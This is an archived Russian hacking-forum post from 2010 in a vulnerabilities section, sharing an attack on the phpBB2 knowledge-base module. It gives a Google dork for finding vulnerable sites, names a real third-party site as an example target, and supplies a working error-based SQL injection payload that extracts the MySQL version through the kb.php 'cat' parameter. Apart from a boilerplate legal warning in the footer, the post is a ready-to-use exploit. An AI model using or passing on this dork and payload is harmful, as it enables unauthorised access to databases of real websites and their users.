Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

PhpBB

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> PhpBB
Имя
Сообщение << Старые топики   Новые топики >>
PhpBB - 2010-03-26 21:33:04.343333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
 Target: phpbb2*
Dork: inurl:"kb.php?mode=cat"
Example:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=13 SQL injection (without union+select):
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+phpbb_kb_categories+group+by+2+limit+1)a) Префикс таблицы kb_categories может отличаться, но его видно в ошибке

PS: актуально для 4.1<=MySQL=>5
Post #: 1
Страниц:  [1]
Все форумы >> [Уязвимости] >> PhpBB







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.